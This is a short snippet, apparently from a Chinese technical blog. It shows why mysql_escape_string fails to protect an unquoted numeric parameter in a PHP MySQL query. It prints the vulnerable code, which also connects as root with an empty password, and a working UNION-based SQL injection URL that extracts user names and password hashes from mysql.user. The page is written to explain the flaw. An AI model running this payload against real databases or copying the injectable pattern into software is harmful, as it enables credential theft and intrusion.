$id = mysql_escape_string($_GET['a']);
$link = mysql_connect('localhost', 'root', '') or die("connect failed");
$sql = "SELECT id,2 FROM test.test WHERE id = $id";
$rt = mysql_query($sql);url:index.php?a=3524710/**/and/**/1=0/**/union/**/select/**/1,concat(user,0x3a,password)/**/from/**/mysql.user/**/where/**/user=substring_index(current_user(),char(64),1)mysql_escape_string不可靠
最新推荐文章于 2021-07-02 14:06:01 发布
511

被折叠的 条评论
为什么被折叠?



